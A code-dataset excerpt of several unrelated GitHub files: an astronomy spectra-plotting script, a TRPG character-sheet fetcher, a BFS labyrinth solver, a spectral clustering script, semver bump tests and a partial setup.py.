Useful for manually masking unreliable spectra due to \n faulty sky subtraction.\n\nINPUTS:\n 'Spectra/spectral_MMT_grid_data.txt'\n 'Spectra/spectral_MMT_grid.fits'\n 'Spectra/spectral_MMT_grid_data.unmasked.txt'\n 'Spectra/spectral_MMT_grid.unmasked.fits'\n 'Catalogs/python_outputs/nbia_all_nsource.fits'\n 'Catalogs/nb_ia_zspec.txt'\n 'FAST/outputs/NB_IA_emitters_allphot.emagcorr.ACpsf_fast.fout'\n\nOUTPUTS:\n 'Composite_Spectra/all_MMT_HaNB921_spectra.pdf'\n\"\"\"\nfrom __future__ import print_function\n\nimport numpy as np, numpy.ma as ma, matplotlib.pyplot as plt\nfrom scipy.interpolate import interp1d\nimport plotting.general_plotting as general_plotting\nfrom astropy.io import fits as pyfits, ascii as asc\nfrom create_ordered_AP_arrays import create_ordered_AP_arrays\nfrom matplotlib.backends.backend_pdf import PdfPages\n\ndef correct_instr_AP(indexed_AP, indexed_inst_str0, instr):\n '''\n Returns the indexed AP_match array based on the 'match_index' from\n plot_MMT/Keck_Ha\n '''\n for ii in range(len(indexed_inst_str0)):\n if indexed_inst_str0[ii]=='merged,':\n if instr=='MMT':\n indexed_AP[ii] = indexed_AP[ii][:5]\n elif instr=='Keck':\n indexed_AP[ii] = indexed_AP[ii][6:]\n #endif\n #endfor\n return indexed_AP\n#enddef\n\n\ndef remove_empty_plots(tempdiff, f, current_axis):\n '''\n Removes empty plots at the end of the PDF\n '''\n if tempdiff != 0:\n for ii in np.arange(8, 4-tempdiff, -1):\n f.get_axes()[ii].axis('off')\n #endfor\n #endif\n#enddef\n\n\ndef masked_MMT_grid(full_path, NAME0, inst_str0, inst_dict, AP):\n '''\n Obtains the masked MMT grid data\n '''\n print('### looking at the MMT grid')\n griddata = asc.read(full_path+'Spectra/spectral_MMT_grid_data.txt',guess=False)\n gridz = np.array(griddata['ZSPEC']) ##used\n gridap = np.array(griddata['AP']) ##used\n grid = pyfits.open(full_path+'Spectra/spectral_MMT_grid.fits')\n grid_ndarr = grid[0].data ##used\n grid_hdr = grid[0].header\n CRVAL1 = grid_hdr['CRVAL1']\n CDELT1 = grid_hdr['CDELT1']\n NAXIS1 = grid_hdr['NAXIS1']\n x0 = np.arange(CRVAL1, CDELT1*NAXIS1+CRVAL1, CDELT1) ##used\n # mask spectra that doesn't exist or lacks coverage in certain areas\n ndarr_zeros = np.where(grid_ndarr == 0)\n mask_ndarr = np.zeros_like(grid_ndarr)\n mask_ndarr[ndarr_zeros] = 1\n # mask spectra with unreliable redshift\n bad_zspec = [x for x in range(len(gridz)) if gridz[x] > 9 or gridz[x] < 0]\n mask_ndarr[bad_zspec,:] = 1\n grid_ndarr = ma.masked_array(grid_ndarr, mask=mask_ndarr, fill_value=np.nan)\n\n \n index_list = general_plotting.get_index_list(NAME0, inst_str0, inst_dict, 'MMT')\n match_index = index_list[2]\n\n AP_match = correct_instr_AP(AP[match_index], inst_str0[match_index], 'MMT')\n input_index = np.array([x for x in range(len(gridap)) if gridap[x] in\n AP_match],dtype=np.int32)\n\n ff='NB921'\n ndarr = grid_ndarr[input_index]\n zspec = gridz[input_index]\n\n ndarr[np.where(ndarr.mask==True)] = np.nan\n\n x_rest = np.arange(3700, 6700, 0.1)\n new_grid = np.ndarray(shape=(len(ndarr), len(x_rest)))\n #deshifting to rest-frame wavelength\n for (row_num, ii) in zip(range(len(ndarr)), input_index):\n #normalizing\n spec_test = ndarr[row_num]\n\n #interpolating a function for rest-frame wavelength and normalized y\n x_test = x0/(1.0+zspec[row_num])\n f = interp1d(x_test, spec_test, bounds_error=False, fill_value=np.nan)\n\n #finding the new rest-frame wavelength values from the interpolation\n #and putting them into the 'new grid'\n spec_interp = f(x_rest)\n new_grid[row_num] = spec_interp\n #endfor\n return new_grid, gridap, 
input_index, x_rest, match_index\n#enddef\n\n\ndef unmasked_MMT_grid(full_path, NAME0, inst_str0, inst_dict, AP):\n '''\n Obtains the unmasked MMT grid data\n '''\n print('### looking at the unmasked (_um) MMT grid')\n griddata = asc.read(full_path+'Spectra/spectral_MMT_grid_data.unmasked.txt',guess=False)\n gridz = np.array(griddata['ZSPEC']) ##used\n gridap = np.array(griddata['AP']) ##used\n grid = pyfits.open(full_path+'Spectra/spectral_MMT_grid.unmasked.fits')\n grid_ndarr = grid[0].data ##used\n grid_hdr = grid[0].header\n CRVAL1 = grid_hdr['CRVAL1']\n CDELT1 = grid_hdr['CDELT1']\n NAXIS1 = grid_hdr['NAXIS1']\n x0 = np.arange(CRVAL1, CDELT1*NAXIS1+CRVAL1, CDELT1) ##used\n # mask spectra that doesn't exist or lacks coverage in certain areas\n ndarr_zeros = np.where(grid_ndarr == 0)\n mask_ndarr = np.zeros_like(grid_ndarr)\n mask_ndarr[ndarr_zeros] = 1\n # mask spectra with unreliable redshift\n bad_zspec = [x for x in range(len(gridz)) if gridz[x] > 9 or gridz[x] < 0]\n mask_ndarr[bad_zspec,:] = 1\n grid_ndarr = ma.masked_array(grid_ndarr, mask=mask_ndarr, fill_value=np.nan)\n\n \n index_list = general_plotting.get_index_list(NAME0, inst_str0, inst_dict, 'MMT')\n match_index = index_list[2]\n\n AP_match = correct_instr_AP(AP[match_index], inst_str0[match_index], 'MMT')\n input_index = np.array([x for x in range(len(gridap)) if gridap[x] in\n AP_match],dtype=np.int32)\n\n ff='NB921'\n ndarr = grid_ndarr[input_index]\n zspec = gridz[input_index]\n\n ndarr[np.where(ndarr.mask==True)] = np.nan\n\n x_rest = np.arange(3700, 6700, 0.1)\n new_grid_um = np.ndarray(shape=(len(ndarr), len(x_rest)))\n #deshifting to rest-frame wavelength\n for (row_num, ii) in zip(range(len(ndarr)), input_index):\n #normalizing\n spec_test = ndarr[row_num]\n\n #interpolating a function for rest-frame wavelength and normalized y\n x_test = x0/(1.0+zspec[row_num])\n f = interp1d(x_test, spec_test, bounds_error=False, fill_value=np.nan)\n\n #finding the new rest-frame wavelength values from the interpolation\n #and putting them into the 'new grid'\n spec_interp = f(x_rest)\n new_grid_um[row_num] = spec_interp\n #endfor\n return new_grid_um\n#enddef\n\n\ndef plotting_spectra(full_path, new_grid, new_grid_um, gridap, input_index, x_rest, match_index):\n '''\n Plots the behavior of MMT Halpha NB921 sources around the Halpha emission\n line.\n \n Red dashed lines denote unmasked data; blue solid lines denote masked\n data (what will be used).\n '''\n pp = PdfPages(full_path+'Composite_Spectra/all_MMT_HaNB921_spectra.pdf')\n # get 9 per page\n for row, row_ii, AP in zip(new_grid, range(len(new_grid)), gridap[input_index]):\n if row_ii %9 == 0: # new page\n f, axarr = plt.subplots(3, 3)\n f.set_size_inches(12, 12)\n ax_list = np.ndarray.flatten(axarr)\n #endif\n \n axnum = row_ii%9\n current_axis = f.get_axes()[axnum]\n\n if not np.all(np.isnan(row/1e-17)):\n redmaskval = x_rest[np.max([x for x in range(len(row)) if not np.isnan(row[x]/1e-17)])]\n print(AP, '\\t', redmaskval)\n \n current_axis.plot(x_rest, row/1e-17, 'b', label='masked')\n current_axis.plot(x_rest, new_grid_um[row_ii]/1e-17, 'r--', alpha=0.6, label='unmasked')\n current_axis.set_xlim(6503, 6623)\n ymaxval = max(current_axis.get_ylim())\n current_axis.plot([6563,6563], [0,ymaxval],'k',alpha=0.7,zorder=1)\n current_axis.text(0.03,0.97,AP,transform=current_axis.transAxes,fontsize=7,ha='left',\n va='top')\n\n if axnum==8 or row_ii==len(new_grid)-1: #last on page\n if row_ii==len(match_index)-1: #last on last page of file\n remove_empty_plots((8-axnum), f, 
 current_axis)\n            #endif\n            pp.savefig()\n            plt.close()\n        #endif\n    #endfor\n    pp.close()\n#enddef\n\n\ndef main():\n    full_path = '/Users/kaitlynshin/GoogleDrive/NASA_Summer2015/'\n\n    nbia = pyfits.open(full_path+'Catalogs/NB_IA_emitters.nodup.colorrev.fix.fits')\n    nbiadata = nbia[1].data\n    NAME0 = nbiadata['NAME']\n\n    zspec = asc.read(full_path+'Catalogs/nb_ia_zspec.txt',guess=False,\n                     Reader=asc.CommentedHeader)\n    inst_str0 = np.array(zspec['inst_str0']) ##used\n\n    fout = asc.read(full_path+'FAST/outputs/NB_IA_emitters_allphot.emagcorr.ACpsf_fast.fout',\n                    guess=False,Reader=asc.NoHeader)\n    stlr_mass = np.array(fout['col7']) ##used\n    nan_stlr_mass = np.copy(stlr_mass)\n    nan_stlr_mass[nan_stlr_mass < 0] = np.nan\n\n    data_dict = create_ordered_AP_arrays(AP_only = True)\n    AP = data_dict['AP'] ##used\n\n    inst_dict = {} ##used\n    inst_dict['MMT'] = ['MMT,FOCAS,','MMT,','merged,','MMT,Keck,']\n    inst_dict['Keck'] = ['merged,','Keck,','Keck,Keck,','Keck,FOCAS,',\n                         'Keck,FOCAS,FOCAS,','Keck,Keck,FOCAS,']\n    tol = 3 #in angstroms, used for NII emission flux calculations ##used\n\n    new_grid, gridap, input_index, x_rest, match_index = masked_MMT_grid(full_path, NAME0, inst_str0, inst_dict, AP)\n    new_grid_um = unmasked_MMT_grid(full_path, NAME0, inst_str0, inst_dict, AP)\n\n    plotting_spectra(full_path, new_grid, new_grid_um, gridap, input_index, x_rest, match_index)\n    \n    print('done')\n#enddef\n\n\nif __name__ == '__main__':\n    main()","repo_name":"kaitshin/LowM_MainSequence","sub_path":"inspecting_mmt_ha_nb921_spectra.py","file_name":"inspecting_mmt_ha_nb921_spectra.py","file_ext":"py","file_size_in_byte":9471,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"}
{"seq_id":"5789527624","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\nimport json\r\nimport re\r\nimport aiohttp\r\n\r\nimport LakshmiErrors\r\nfrom contents.character.Investigator import Investigator, SkillSet\r\nfrom contents.character.sitegetter.AbstractCharacterGetter import AbstractCharacterGetter\r\n\r\nclass VampireBloodNetGetter(AbstractCharacterGetter):\r\n    DETECT_TARGET_URL = re.compile(r\"^.*charasheet\\.vampire\\-blood\\.net.*$\", re.IGNORECASE)\r\n    SKILL_TITLE_SPLIT = re.compile(r\"^([^(【〔[《『「(\\[)】〕]》』」)\\]]+)([(【〔[《『「(\\[]+)([^)】〕]》』」)\\]]+)([)】〕]》』」)\\]])?$\", re.IGNORECASE)\r\n\r\n    def __init__(self):\r\n        pass\r\n\r\n    @classmethod\r\n    def get_site_title(self) -> str:\r\n        return \"キャラクター保管所 (charasheet.vampire-blood.net)\"\r\n\r\n    @classmethod\r\n    def is_detect_url(self, site_url: str) -> bool:\r\n        return (VampireBloodNetGetter.DETECT_TARGET_URL.search(site_url) != None)\r\n\r\n    @classmethod\r\n    def get_favicon_url(self) -> str:\r\n        return \"https://www.google.com/s2/favicons?domain=charasheet.vampire-blood.net\"\r\n\r\n    @classmethod\r\n    async def request(self, site_url: str) -> Investigator:\r\n        result = None\r\n        response = None\r\n        data = None\r\n        try:\r\n            # https://charasheet.vampire-blood.net/help/webif\r\n            request_url = site_url + \".js\"\r\n\r\n            async with aiohttp.ClientSession() as session:\r\n                async with session.get(request_url) as response:\r\n                    if response.status == 200:\r\n                        data = await response.json()\r\n        except Exception as e:\r\n            response = None\r\n\r\n        if response:\r\n            # Reject the sheet if it is not Call of Cthulhu (coc) data.\r\n            if data[\"game\"] != \"coc\":\r\n                raise LakshmiErrors.NotCallOfCthulhuInvestigatorException()\r\n\r\n            result = Investigator()\r\n            result.unique_id = \"\"                                  # Key\r\n            result.site_id1 = str(data[\"data_id\"])                 # SiteId1\r\n            result.site_id2 = str(data[\"phrase\"])                  # SiteId2\r\n            result.site_url = site_url                             # SiteUrl\r\n            result.site_name = self.get_site_title()               # SiteName\r\n            result.site_favicon_url = self.get_favicon_url()       # SiteFaviconUrl\r\n            result.author_id = \"\"                                  # owner id\r\n            result.author_name = \"\"                                # owner name\r\n            result.active = False                                  # Active\r\n            result.lost = False                                    # Lost\r\n            result.tag = data[\"pc_tags\"]                           # tags\r\n            result.image_url = \"\"                                  # image URL\r\n\r\n            # personal data\r\n            result.personal_data.name = data[\"pc_name\"]            # name\r\n            result.personal_data.occupation = data[\"shuzoku\"]      # occupation\r\n            result.personal_data.age = data[\"age\"]                 # age\r\n            result.personal_data.sex = data[\"sex\"]                 # sex\r\n            result.personal_data.residence = \"\"                    # residence\r\n            result.personal_data.birthplace = data[\"pc_kigen\"]     # birthplace\r\n\r\n            result.personal_data.height = data[\"pc_height\"]        # height\r\n            result.personal_data.weight = data[\"pc_weight\"]        # weight\r\n            result.personal_data.hair_color = data[\"color_hair\"]   # hair color\r\n            result.personal_data.eye_color = data[\"color_eye\"]     # eye color\r\n            result.personal_data.skin_color = data[\"color_skin\"]   # skin color\r\n\r\n            result.personal_data.backstory = data[\"pc_making_memo\"]    # misc notes\r\n\r\n            # characteristics\r\n            result.characteristics[\"strength\"].set_values(data[\"NA1\"], data[\"NS1\"], data[\"NM1\"], data[\"NP1\"])\r\n            result.characteristics[\"constitution\"].set_values(data[\"NA2\"], data[\"NS2\"], data[\"NM2\"], data[\"NP2\"])\r\n            result.characteristics[\"power\"].set_values(data[\"NA3\"], data[\"NS3\"], data[\"NM3\"], data[\"NP3\"])\r\n            result.characteristics[\"dexterity\"].set_values(data[\"NA4\"], data[\"NS4\"], data[\"NM4\"], data[\"NP4\"])\r\n            result.characteristics[\"appearance\"].set_values(data[\"NA5\"], data[\"NS5\"], data[\"NM5\"], data[\"NP5\"])\r\n            result.characteristics[\"size\"].set_values(data[\"NA6\"], data[\"NS6\"], data[\"NM6\"], data[\"NP6\"])\r\n            result.characteristics[\"intelligence\"].set_values(data[\"NA7\"], data[\"NS7\"], data[\"NM7\"], data[\"NP7\"])\r\n            result.characteristics[\"education\"].set_values(data[\"NA8\"], data[\"NS8\"], data[\"NM8\"], data[\"NP8\"])\r\n            result.characteristics[\"hit_points\"].set_values(data[\"NA9\"], data[\"NS9\"], data[\"NM9\"], data[\"NP9\"])\r\n            result.characteristics[\"magic_points\"].set_values(data[\"NA10\"], data[\"NS10\"], data[\"NM10\"], data[\"NP10\"])\r\n            result.characteristics[\"initial_sanity\"].set_values(data[\"NA11\"], data[\"NS11\"], data[\"NM11\"], data[\"NP11\"])\r\n            result.characteristics[\"idea\"].set_values(data[\"NA12\"], data[\"NS12\"], data[\"NM12\"], data[\"NP12\"])\r\n            result.characteristics[\"luck\"].set_values(data[\"NA13\"], data[\"NS13\"], data[\"NM13\"], data[\"NP13\"])\r\n            result.characteristics[\"knowledge\"].set_values(data[\"NA14\"], data[\"NS14\"], data[\"NM14\"], data[\"NP14\"])\r\n\r\n            # sanity (SAN) points\r\n            result.sanity_points.current = data[\"SAN_Left\"]\r\n            result.sanity_points.max_insane = data[\"SAN_Max\"]\r\n            result.sanity_points.indef_insane = data[\"SAN_Danger\"]\r\n\r\n            # skill points\r\n            result.skill_points.remaining_occupation = data[\"TS_Total\"]    # remaining occupation points\r\n            result.skill_points.remaining_interest = data[\"TK_Total\"]      # remaining interest points\r\n            result.skill_points.max_occupation = data[\"TS_Maximum\"]        # max occupation points\r\n            result.skill_points.max_interest = data[\"TK_Maximum\"]          # max interest points\r\n            result.skill_points.additions_occupation = data[\"TS_Add\"]      # additional occupation points\r\n            result.skill_points.additions_interest = data[\"TK_Add\"]        # additional interest points\r\n\r\n            # combat skills\r\n            keylists = [\"dodge\", \"kick\", \"grapple\", \"fist_punch\", \"head_butt\", \"throw\", \"martial_arts\", \"handgun\", \"smg\", \"shotgun\", \"machine_gun\", \"rifle\"]\r\n            self.set_skills_values(result.combat_skills, keylists, data, \"TBAU\", \"TBAD\", \"TBAS\", \"TBAK\", \"TBAA\", \"TBAO\", \"TBAP\", \"TBAName\")\r\n\r\n            # search skills\r\n            keylists = [\"first_aid\", \"locksmith\", \"conceal\", \"hide\", \"listen\", \"sneak\", \"photography\", \"psychoanalysis\", \"track\", \"climb\", \"library_use\", \"spot_hidden\"]\r\n            self.set_skills_values(result.search_skills, keylists, data, \"TFAU\", \"TFAD\", \"TFAS\", \"TFAK\", \"TFAA\", \"TFAO\", \"TFAP\", \"TFAName\")\r\n\r\n            # behavioral skills\r\n            keylists = [\"drive\", \"mech_repair\", \"opr_hvy_machine\", \"ride\", \"swim\", \"craft\", \"pilot\", \"jump\", \"electr_repair\", \"navigate\", \"disguise\"]\r\n            self.set_skills_values(result.behavioral_skills, keylists, data, \"TAAU\", \"TAAD\", \"TAAS\", \"TAAK\", \"TAAA\", \"TAAO\", \"TAAP\", \"TAAName\")\r\n\r\n            result.behavioral_skills[\"drive\"].skill_subname = str(data[\"unten_bunya\"]).strip()\r\n            result.behavioral_skills[\"craft\"].skill_subname = str(data[\"seisaku_bunya\"]).strip()\r\n            result.behavioral_skills[\"pilot\"].skill_subname = str(data[\"main_souju_norimono\"]).strip()\r\n\r\n            # negotiation skills\r\n            keylists = [\"fast_talk\", \"credit_rating\", \"persuade\", \"bargain\", \"own_language\"]\r\n            self.set_skills_values(result.negotiation_skills, keylists, data, \"TCAU\", \"TCAD\", \"TCAS\", \"TCAK\", \"TCAA\", \"TCAO\", \"TCAP\", \"TCAName\")\r\n\r\n            result.negotiation_skills[\"own_language\"].skill_subname = str(data[\"mylang_name\"]).strip()\r\n\r\n            # knowledge skills\r\n            keylists = [\"medicine\", \"occult\", \"chemistry\", \"cthulhu_mythos\", \"art\", \"accounting\", \"archeology\", \"computer\", \"psychology\",\r\n                        \"anthropology\", \"biology\", \"geology\", \"electronics\", \"astronomy\", \"natural_history\", \"physics\", \"law\", \"pharmacy\", \"history\"]\r\n            self.set_skills_values(result.knowledge_skills, keylists, data, \"TKAU\", \"TKAD\", \"TKAS\", \"TKAK\", \"TKAA\", \"TKAO\", \"TKAP\", \"TKAName\")\r\n\r\n            result.knowledge_skills[\"art\"].skill_subname = str(data[\"geijutu_bunya\"]).strip()\r\n\r\n            # TODO:\r\n            # combat / weapons / armor\r\n            # possessions / money\r\n\r\n            # last updated timestamp\r\n            #created_at already set\r\n        return result\r\n\r\n    @classmethod\r\n    def set_skills_values(self, skills, defaultkeys, data, growth_checke_key, base_key, occupation_key, interest_key, growth_key, other_key, current_key, additions_name_key):\r\n        # get the number of skill entries\r\n        skills_count = len(data[growth_checke_key])\r\n\r\n        for index in range(skills_count):\r\n            growth_check = (len(str(data[growth_checke_key][index]).strip()) >= 1)\r\n\r\n            if index < len(defaultkeys):\r\n                # default skill\r\n                key = defaultkeys[index]\r\n            else:\r\n                # additional (custom) skill\r\n                key = f'additions_{index}'\r\n\r\n                additions_index = index - len(defaultkeys) - 1\r\n                additions_title = str(data[additions_name_key][additions_index]).strip()\r\n\r\n                # skill name\r\n                skill_name = \"\"\r\n                skill_subname = \"\"\r\n                match = VampireBloodNetGetter.SKILL_TITLE_SPLIT.search(additions_title)\r\n                if match:\r\n                    skill_name = str(match.group(1))\r\n                    skill_subname = str(match.group(3))\r\n                else:\r\n                    skill_name = additions_title\r\n                    skill_subname = \"\"\r\n\r\n                skills[key] = SkillSet(skill_name, skill_subname)\r\n                # skill type\r\n                skills[key].skill_type = \"additions\"\r\n\r\n            skills[key].set_values(\r\n                # growth check\r\n                growth_check,\r\n                # initial (base) value\r\n                int(data[base_key][index] or 0),\r\n                # occupation points\r\n                int(data[occupation_key][index] or 0),\r\n                # interest points\r\n                int(data[interest_key][index] or 0),\r\n                # growth amount\r\n                int(data[growth_key][index] or 0),\r\n                # other additions\r\n                int(data[other_key][index] or 0),\r\n                # current value\r\n                
int(data[current_key][index] or 0),\r\n            )\r\n        return self\r\n","repo_name":"jakenjarvis/Lakshmi","sub_path":"contents/character/sitegetter/VampireBloodNetGetter.py","file_name":"VampireBloodNetGetter.py","file_ext":"py","file_size_in_byte":10815,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"}
{"seq_id":"20676490650","text":"'''\nLink: https://cses.fi/problemset/task/1193\n \nProblem summary: \nSimilar to Counting Rooms: you are given a matrix of the characters '#'\nand '.' representing the map of a building. '#' means there is\na wall in that cell, and '.' means the cell is free space. \n\nAdditionally there are two characters 'A' and 'B' that mark the start\ncell and the end cell, respectively.\n \nIf there is no path from 'A' to 'B', you must print \"NO\".\nIf a path exists, you must print \"YES\" and find the shortest one.\nYou must print its length and the sequence of moves along that path.\nIf more than one shortest path exists, you may print any of them.\n\nMoves are denoted by the characters L, R, U, D (left,\nright, up and down, respectively).\n'''\n\nfrom collections import deque\n \n## Two parallel arrays dx, dy that enumerate the moves\n## Move i is (x + dx[i], y + dy[i])\ndx = [1, -1, 0, 0]\ndy = [0, 0, 1, -1]\ndd = list(\"DURL\") #to label the moves\nn, m = [int(x) for x in input().split()] \n\n#Matrix for the map\nmat = [[] for x in range(n)] \n\nstart, end = (-1, -1), (-1, -1)\nfor i in range(n):\n\tmat[i] = list(input())\n\tfor j in range(m):\n\t\tif mat[i][j] == 'A':\n\t\t\tstart = (i, j)\n\t\tif mat[i][j] == 'B':\n\t\t\tend = (i, j)\n\n# Matrix of visited cells and the move used to reach each one\np = [[-1 for y in range(m)] for x in range(n)] #p\n\np[start[0]][start[1]] = -2\nq = deque([start])\n\ndef valid(r, c):\n\treturn (r >= 0) and (r < n) and (c >= 0) and (c < m) \\\n\t\tand (mat[r][c] != '#') and (p[r][c] == -1)\n\ndef reconstruct_path():\n\tprint(\"YES\")\n\tr, c = end\n\tpath = deque()\n\twhile p[r][c] >= 0:\n\t\ti = p[r][c] \n\t\tpath.appendleft(dd[i])\n\t\tr -= dx[i]\n\t\tc -= dy[i]\n\tprint(len(path))\n\tprint(''.join(path))\n\n\t\t\nwhile len(q):\n\tr, c = q.popleft()\n\tif (r, c) == end:\n\t\treconstruct_path()\n\t\texit()\n\tfor i in range(4):\n\t\tnr, nc = r + dx[i], c + dy[i]\n\t\tif valid(nr, nc):\n\t\t\tp[nr][nc] = i\n\t\t\tq.append((nr, nc))\n\nprint(\"NO\")\n","repo_name":"oscarburga/tutorias-complejidad-algoritmica-2020-02","sub_path":"s5/labyrinth.py","file_name":"labyrinth.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"es","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"}
{"seq_id":"10243454772","text":"# To get the packages: pip3 install -r requirements.txt\n\nimport numpy as np\nfrom sklearn.cluster import KMeans\nimport numpy.linalg as npl\nimport fileLoad\n\nnp.set_printoptions(suppress=True)\n\nA = np.array( [ [0, 1, 1, 0, 0, 0, 0, 0, 0]\n              , [1, 0, 1, 0, 0, 0, 0, 0, 0]\n              , [1, 1, 0, 1, 1, 0, 0, 0, 0]\n              , [0, 0, 1, 0, 1, 1, 1, 0, 0]\n              , [0, 0, 1, 1, 0, 1, 1, 0, 0]\n              , [0, 0, 0, 1, 1, 0, 1, 1, 0]\n              , [0, 0, 0, 1, 1, 1, 0, 1, 0]\n              , [0, 0, 0, 0, 0, 1, 1, 0, 1]\n              , [0, 0, 0, 0, 0, 0, 0, 1, 0]\n              ])\n\nAsmall = np.array( [ [0, 1, 1, 0, 0, 0]\n                   , [1, 0, 1, 0, 0, 0]\n                   , [1, 1, 0, 1, 0, 0]\n                   , [0, 0, 1, 0, 1, 1]\n                   , [0, 0, 0, 1, 0, 1]\n                   , [0, 0, 0, 1, 1, 0]\n                   ])\n\ndef mkLaplacian(A):\n    L = A * -1\n    D = [sum(row) for row in A]\n    for x in range(0, len(D)):\n        L[x,x] = D[x] + A[x,x]\n    return 
L\n\ndef mkEigenDecom(L):\n return npl.eig(L)\n\n# We need second smallest because of math\ndef getSecondSmallestEigenVector(eigenDecom):\n eigValues = eigenDecom[0]\n smallestIndex = 0\n secondSmallIndex = 0\n smallestValue = float('inf')\n secondSmallValue = float('inf')\n\n for x in range(0,len(eigValues)):\n value = eigValues[x]\n if value <= smallestValue:\n secondSmallValue = smallestValue\n secondSmallIndex = smallestIndex\n\n smallestValue = value\n smallestIndex = x\n elif value <= secondSmallValue:\n secondSmallValue = value\n secondSmallIndex = x\n\n return eigenDecom[1][:,secondSmallIndex]\n\ndef getClusterAmount(matrix):\n return 5 # dynamic\n\ndef getClusters(amount, eigenVector):\n kmeans = KMeans(n_clusters=amount)\n transposed = eigenVector.reshape(-1,1)\n\n return kmeans.fit(transposed.real).labels_\n\ndef runSmallExample(): # from Lecture 7, slide 28\n L = mkLaplacian(Asmall)\n print(L)\n eiDecom = mkEigenDecom(L)\n print(eiDecom)\n sSEV = getSecondSmallestEigenVector(eiDecom)\n print(sSEV)\n clusters = getClusters(2, sSEV) \n print(clusters)\n\ndef run():\n print(\"Loading network...\")\n A, _ = fileLoad.getSparseFriendsDefault()\n print(\"Done\")\n print(\"Laplacian... \")\n L = mkLaplacian(A)\n print(\"Done\")\n print(\"Getting eigendecomposition...\")\n eiDecom = mkEigenDecom(L)\n print(\"Done\")\n print(\"Getting second smallest eigen vector...\")\n sSEV = getSecondSmallestEigenVector(eiDecom)\n print(\"Done\")\n print(\"\\\"Computing\\\" cluster amounts...\")\n clustAmount = getClusterAmount(sSEV)\n print(\"Done\")\n print(\"Getting clusters...\")\n clusters = getClusters(clustAmount, sSEV)\n print(clusters)\n\n print(\"Writing clusters to file: 'material/clusteringResults.txt'...\")\n with open('material/clusteringResults.txt', 'w') as f:\n for item in clusters:\n f.write(\"%s\\n\" % item)\n\n print(\"Done\")\n\n\n\nrunSmallExample()\n# The small graph\n# 1 \\ / 5\n# | 3 - 4 |\n# 2 / \\ 6\n# \n# sSEV: [ 0.46470513 0.46470513 0.26095647 -0.26095647 -0.46470513 -0.46470513]\n# Splits: [1 1 1 0 0 0]\n\n\n#run()\n\n","repo_name":"Jgfrausing/wi-network","sub_path":"clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10256345174","text":"\nimport unittest\nfrom mock import patch\nfrom mock import Mock\nfrom pygsver.bump import run_bump\nfrom pygsver.bump import check_prerelease\nfrom pygsver.bump import bump_version\nfrom pygsver.errors import PrereleaseMismatchError\n\n\nclass TestBump(unittest.TestCase):\n\n def setUp(self):\n \"\"\"\n \"\"\"\n pass\n\n def tearDown(self):\n \"\"\"\n \"\"\"\n pass\n\n @patch('pygsver.bump.write_version')\n @patch('pygsver.bump.bump_version')\n @patch('pygsver.bump.read_version')\n def test__run_bump_Should_CallExpected_When_Called(self, read_version_patch, bump_version_patch, write_version_patch, *patches):\n settings = {\n 'semver_branch': 'main',\n 'semver_path': '/repo/.semver'\n }\n repo_mock = Mock()\n run_bump(repo_mock, axis='--axis--', prefix='--prefix--', settings=settings)\n bump_version_patch.assert_called_once_with(read_version_patch.return_value, '--axis--', '--prefix--')\n write_version_patch.assert_called_once_with(settings, str(bump_version_patch.return_value), force=True)\n\n def test__check_prerelease_Should_RaisePrereleaseMismatchError_When_PrereleaseMismatch(self, *patches):\n with self.assertRaises(PrereleaseMismatchError):\n check_prerelease('dev.1', 'test')\n 
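# a matching prerelease token must pass without raising\n        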
check_prerelease('dev.1', 'dev')\n\n def test__bump_version_Should_ReturnExpectedVersion_When_Called(self, *patches):\n self.assertEqual(str(bump_version('0.1.0', 'major', None)), '1.0.0')\n self.assertEqual(str(bump_version('0.1.0', 'minor', None)), '0.2.0')\n self.assertEqual(str(bump_version('0.1.0', 'patch', None)), '0.1.1')\n self.assertEqual(str(bump_version('0.1.1', 'patch', 'dev')), '0.1.2')\n self.assertEqual(str(bump_version('0.1.0', 'pre', 'dev')), '0.1.1-dev.1')\n self.assertEqual(str(bump_version('0.1.1-dev.1', 'pre', 'dev')), '0.1.1-dev.2')\n self.assertEqual(str(bump_version('0.1.1-dev.2', 'final', None)), '0.1.1')\n with self.assertRaises(PrereleaseMismatchError):\n bump_version('0.1.1-dev.1', 'pre', 'rc')\n\n self.assertEqual(str(bump_version('1.0.0', 'pre', 'dev')), '1.0.1-dev.1')\n\n version = bump_version('1.0.1', 'pre', 'dev')\n self.assertEqual(str(version), '1.0.2-dev.1')\n\n version = bump_version(str(version), 'pre', 'dev')\n self.assertEqual(str(version), '1.0.2-dev.2')\n\n version = bump_version(str(version), 'patch', None)\n self.assertEqual(str(version), '1.0.3')\n\n version = bump_version(str(version), 'pre', 'dev')\n self.assertEqual(str(version), '1.0.4-dev.1')\n\n version = bump_version(str(version), 'minor', None)\n self.assertEqual(str(version), '1.1.0')\n\n version = bump_version(str(version), 'pre', 'dev')\n self.assertEqual(str(version), '1.1.1-dev.1')\n\n version = bump_version(str(version), 'major', None)\n self.assertEqual(str(version), '2.0.0')\n\n version = bump_version(str(version), 'pre', 'dev')\n self.assertEqual(str(version), '2.0.1-dev.1')\n\n version = bump_version(str(version), 'final', None)\n self.assertEqual(str(version), '2.0.1')\n\n version = bump_version(str(version), 'pre', 'dev')\n self.assertEqual(str(version), '2.0.2-dev.1')\n\n version = bump_version(str(version), 'pre', None)\n self.assertEqual(str(version), '2.0.2-dev.2')\n","repo_name":"edgexfoundry/git-semver","sub_path":"src/unittest/python/test_bump.py","file_name":"test_bump.py","file_ext":"py","file_size_in_byte":3407,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"75"} +{"seq_id":"35731132064","text":"import os\nimport re\nfrom setuptools import setup, find_packages\n\n\n__pkg_name__ = 'protein_design'\n\nverstrline = open(os.path.join(__pkg_name__, '__init__.py'), 'r').read()\nvsre = r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\"\nmo = re.search(vsre, verstrline, re.M)\nif mo:\n __version__= mo.group(1)\nelse:\n raise RuntimeError('Unable to find version string in \"{}/__init__.py\".'.format(__pkg_name__))\n\nwith open('requirements.txt') as f:\n requirements = f.read().splitlines()\n\nsetup(name=__pkg_name__,\n version=__version__,\n packages=find_packages(),\n 